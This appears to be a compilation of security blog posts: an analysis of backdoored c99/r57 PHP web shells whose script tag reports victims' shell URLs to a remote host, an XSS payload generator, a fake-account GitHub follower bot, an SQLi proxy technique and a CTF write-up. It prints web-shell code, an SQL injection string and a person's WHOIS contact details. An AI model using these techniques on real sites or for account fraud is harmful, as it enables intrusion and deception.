TL;DR all shells from http://www.r57.gen.tr/ are backdoored, shockingly. But in a pretty clever way you probably didn’t expect.

You know sometimes when I find things in security that are probably unethical, I’m more impressed than morally distressed.

I decided to poke around some of the online sources for the typical shells (c99, r57, etc) and after a quick search:

I’ve got all the shells I’d ever need!

Or do I? Let’s check out this first site shall we?

C99 is probably the more famous one, so let’s take a look at it!

mandatory@mandatorys-box:~/Pentest/c99$ grep --color -n "https://" c99.php 

79:if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}

1706:   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}


mandatory@mandatorys-box:~/Pentest/c99$ grep --color -n "http://" c99.php 
11:   http://ccteam.ru/releases/c99shell

13:*  WEB: http://ccteam.ru

79:if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}

99:$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";

103:$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/"; //Update server

259:if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}

599:# Home page: http://ccteam.ru

855:?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software: <?php echo $DISP_SERVER_SOFTWARE; ?></b> </p><p align="left"><b>uname -a: <?php echo wordwrap(php_uname(),90,"<br>",1); ?></b> </p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b> </p><p align="left"><b>Safe-mode: <?php echo $hsafemode; ?></b></p><p align="left"><?php
1706:   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}

2912:if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";}

2926:<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>powered by</b></u></a> Captain Crunch Security Team | <a href="http://r57.gen.tr"><font color="#FF0000">r57 shell</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>

mandatory@mandatorys-box:~/Pentest/c99$ 

Now immediately everyone’s first thought is to check the PHP itself for clever backdoors. After all, this is a backdoor shell so why wouldn’t it be a backdoored backdoor shell (bleh).

But notice this section:

<SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>

Hmm, what’s the source for that page?

Ho-ho-ho that’s a little suspicious, so it’s making an image with the source being http://www.r57.gen.tr/yaz/yaz.php?a= plus our current URL?

Naughty naughty, navigating to this URL we find:

Oh a blank page, that’s probably nothing at all!

Or…just maybe…they are capturing IP addresses to alert the website owners or steal the shells for themselves (far more likely).

I’m willing to bet there is a PHP auth-bypass in the code as well…

Auth Bypass Exploit

Notice this piece of code here:

Found this after diffing this c99 shell against other online copies. For those not familiar, extract() is a VERY dangerous command to use. Basically you pass it an array and it extracts the values into variables.

This example from the official PHP site says it all:

<?php

/* Suppose that $var_array is an array returned from
   wddx_deserialize */

$size = "large";
$var_array = array("color" => "blue",
                   "size"  => "medium",
                   "shape" => "sphere");
extract($var_array, EXTR_PREFIX_SAME, "wddx");

echo "$color, $size, $shape, $wddx_size\n";

?>

Guess what is right after that line?

So one could very easily over right $login, $md5_pass, etc to override the login.

EDIT: This same JS link is in all of the shells on the site. See r57.php:

74 $head = '<!-- ??????????  ???? -->
  75 <html>
  76 <head>
  77 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
  78 <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

The moral of this lesson is obvious but I’m more entertained by the fact that they went with a JS backdoor. Who would check the Javascript for backdoors? It’s the perfect crime!

The domain is apparently Turkish and has been registered for sometime, so I can’t imagine the amount of bad shells have been distributed.

** Registrant:
   Ýsmail Kalayli
   Gulbahar Mah. Gayret Sk. No:21 K:1
   Mecidiyekoy
   Ýstanbul,
     Türkiye
   Email Masking [email protected]
   + 90-212-3564407
   + 


** Registrar:
NIC Handle	 : cth16-metu
Organization Name	: Çizgi Telekomünikasyon Hizmetleri San. ve Tic.Ltd.Þti.
Address	 : Esentepe Mah. Elif Sk. No:4 K:1
  Mecidiyeköy / Þiþli
  Ýstanbul,34390
  Türkiye
Phone	 : + 90-212-2131213-
Fax	 : + 90-212-3564407


** Domain Servers:
ns1.teenficken.com
ns2.teenficken.com

** Additional Info:
Created on..............: 2008-Oct-22.
Expires on..............: 2015-Oct-21.

But let’s be honest, somebody has to have noticed this right…?

Or maybe nobody actually falls for this…?

Which isn’t even the source but copied from http://www.computersecuritystudent.com/SECURITY_TOOLS/MUTILLIDAE/MUTILLIDAE_2511/lesson11/

For archiving reasons I’ll keep the source here to show the *current* backdoor in case it’s changed: http://pastebin.com/LCDrr0e8

EDIT: I now have a moral dilemma because I’m sure people will abuse this exploit to break into more sites…Hmm…

After working with more and more complex Javascript payloads for XSS I realized that most of the work I was doing was unnecessary!

I scraped together some snippets from my Metafidv2 project and created “xssless”, an automated XSS payload generator. This tool is sure to save some time on more complex sites that make use of tons of CSRF tokens and other annoying tricks.

Psst! If you already understand all of this stuff and don’t want to read this post click here for the github link.

The XSS Vulnerability

Once you have your initial XSS vulnerability found you’re basically there! Now you can do evil things like session hijacking and much more!

But wait, what if the site is extra secure and locks you out if you use the same session token from a different IP address? Does this mean your newly found XSS is useless?

Of course not!

XSS Worms & JavaScript Payloads

Remember, if you can execute JavaScript in the user’s browser you can do anything the user’s browser can do. This means as long as you’re obeying same-domain, you’re good to go!

How?

JavaScript payloads of course!

Not only are JavaScript payloads real, they are quite dangerous – people often write-up XSS as being a ‘low priority’ issue in security. This is simply not true, I have to imagine this comes from a lack of amazement at the casual JavaScript popup alerts with session cookies as the message. Less we forget how powerful the Samy Worm was, propagating to over a million accounts and running MySpace’s servers into the ground. This was one of the first big displays of just how powerful XSS could be.

Building Complex Payloads

Building payloads can be a real pain, custom coding every POST/GET request and parsing CSRF tokens all while debugging to ensure it works.

After building a rather complex payload I realized this is pointless, why couldn’t a script do the same?

xssless

Work smart not hard, using xssless you can automatically generate payloads for any site quickly and efficiently.

xssless generates payloads from Burp proxy exported requests, meaning you do your web actions in the browser though Burp and then export them into xssless.

An Example Scenario

Image if we had an XSS in a site we wanted to compromise. You want to get a shell on this server but only employees/administrators can actually upload files. This server is also very secure and will lock you out if you change IP addresses so you can’t just steal the user’s token.

To start, we fire up Burp and set Firefox to use it as a proxy. Now we simply preform this web action in our test environment offline and upload a random file.

Select them in Burp and export them…

And save them somewhere so we can access them.

Great, now we fire up xssless and generate our payload!

mandatorys-box% cat example_csrf_token_list.txt 
CSRFToken
__VIEWSTATE
csrf
__RequestVerificationToken
authenticity_token
csrftoken

mandatorys-box% cat example_file_list.txt 
file,/home/mandatory/Programming/C/hello_world

mandatorys-box% ./xssless.py -s -f=example_file_list.txt -p=example_csrf_token_list.txt file_upload

The Output

Now, a few things have happened here.

-xssless has replaced the uploaded file with the shell specified in example_file_list.txt.

-The CSRF token named “csrftoken” has been automatically parsed due to the -p option specifying example_csrf_token_list.txt.

You now have a fully working payload that you can deploy against your target. Wasn’t that easy?

I’ll be adding more features as time goes on so please comment on any features you’d like to see!

Click Here for the Github Page

</a></center>

After a discussion with a friend of mine I’ve decided to do a blog post about a program I created called “Githug”, and how I used to get to the front of Github.com.

Some background is necessary, I am very into designing web bots to do all sorts of crazy stuff. I often end up building bots just for the hell of it or just because I think something will be funny (to me at least!).  I’d also like to state I don’t dislike Github in anyway rather I think they’re all pretty cool guys!

The Idea

The initial idea came to me while I was chilling in one of my college courses sitting next to my friend who is a solid programmer (something I sadly am not). He had an upcoming interview at a tech company that he was excited about and he mentioned that they would be checking his Github page to see code samples. I jokingly said that I should get him thousands of fake followers to “beef up” his page and make him look like a huge developer. We made some more jokes about what I’d call the bot and decided “Githug” would be a clever name. After joking I probed around Github’s registration system and found out that it didn’t seem like it’d be too complicated to do! I think the rest is a bit…self explanatory.

 

The Script (Githug)

Excuse me for the stupid anime references, this whole thing was just a joke from the beginning.

The script was a pretty straightforward one, all it would do is utilize fake usernames from FakeNameGenerator in conjunction with a disposable email address service all over tor.

That’s quite a mouthful, but all it means is I put some effort into making it look not completely fake (to Github’s systems, in-case they would limit my account creations). After every account was created it would then follow my friend’s Github and logout immediately afterwards. The script would then change it’s exist node “identity” and repeat this process all over again – all while recording the created accounts for later use and noting any errors along the way.

For those who care, the script was created via my Metafid code generation tool which is PHP/cURL based. Yes, I do realize the irony of linking to my Github repo here

 

The Results

I won’t mention what happened to my friend’s Github but let’s say it worked out very well for him (clever readers will probably find it regardless). I will however, post pictures of my Github when I ran this tool continuously for ~20 hours.

 

 

 

 

 

 

 

Recently, I have been doing quite a bit of CTF write-ups for my blog and I’ve seen I continually need to exploit SQLi edge cases. In the “Robots Exclusion Committee Writeup” I had to do SQL injection via basic HTTP authentication which is in all likelihood not found in any tool.  In “CSAW 2013 WidgetCorp Writeup” I had to do SQL injection via a serialized, base64 encoded, cookie. Again, not available on any SQL injection tool.

With a simple script however, you can exploit just about any SQLi edge cases without doing anything manually.

 

All you need to do to exploit these SQLi edge cases is have a custom script hosted locally that encodes the payload and mirrors the remove server’s responses. It’s important to mirror things such as HTTP status codes and other headers because many tools rely on these in order to work. If you don’t replicate them properly you may just confuse your SQL injection tool to no end and get bad results.

In this way you could very easily exploit even the most edge of cases, this doesn’t have to be a manual thing either. You can also just simply manually inject the URL of your local script just like you would on any other remote site.

See here:

 

Here is some example code from that problem:

While this is of course not an efficient or stealthy way to go about things but it’s still a quicker way to exploit things of this type. Perhaps not suitable on a real pen-test but it would serve very helpful for quick CTF like environments. That being said if your edge case is weird enough I doubt most IDS systems would pick up what you’re doing.

Like I said previously in my CSAW post, it’s like being a hybrid script kiddy. Little bit of scripting & a little bit of tool usage and baby you got a stew goin’

On a final note, this would apply to edge cases of other attack types as well. Perhaps you were doing a local file inclusion via some oddly encoded cookies – this technique would work there in largely the same manner.

Until next time,

-mandatory

The challenge:

The link takes you too this page:

Looks very legit, after you fill in some filler junk into the form you get this page:</p>

Oh! You mean that wasn’t it? Hey that’s not very polite either! Apparently robots aren’t the only ones without hearts.

Here is the source for the main page, nothing too interesting here…

I tried checking the CSS to see if it referenced any elements not seen in the two pages we have so far. Suffice to say they don’t but they did have this comment for us:

Taunting in CTF is always fun (or frustrating when you just can’t get it!)

So, let’s think like a robot – where would we check?

Oh right, robots.txt maybe?

 

Those fools! It’s the first place an evil robot would check! This site is clearly ill prepared for any sort of robo-attack

So from this we can glean that WallE is not welcome here and that we _shouldn’t _check out the /vault page…

 

Now, let’s have an honest talk. I was stuck here for quite a while, when I think of HTTP basic authentication I usually thing .htaccess/.htpasswd files and nothing more. All static files and not much to go on except bruteforcing. It took me a while to think about fuzzing this input right here (idioticly so, perhaps).

This is not the case, however. This is actually completely dynamic and not only that but it’s SQL injectable – by setting my password to ” OR 1=1– I was able to null authenticate and get to the vault page.

Like I said, took me far longer that it should’ve to realize that.

 

Before I continue, it’s obviously time for a relevant XKCD on this topic:

Yes, they really have done everything haven’t they?

Moving forward, we know that the HTTP basic authentication script they are running is SQL injectable. Let’s roll with that – we are going to be taking a page from one of my previous posts titled “CSAW 2013 WidgetCorp Writeup, with bonus coolness”. TL;DR we will setup a “proxy” page to do the heavy lifting of encoding the SQL injection payload and set it up as a local server. Once we’ve done this we can point any SQL injection tool at it and wallah!

Great, now that all seems to be functioning correct we’ll point sqlmap at our local page and crack away!

 

Once the injecting has completed we get a dump of their database. This yields two base64 encoded PNG files (secret #1 and secret #2!)

When you decode this base64 you get the following image:

I suggest you re-read the challenge text for a full understanding of the puns missed initially 😛

Overall a very cool challenge, learned a very important lessons about assuming things. I’ll try to remember that for future CTFs!

Until next time,

-mandatory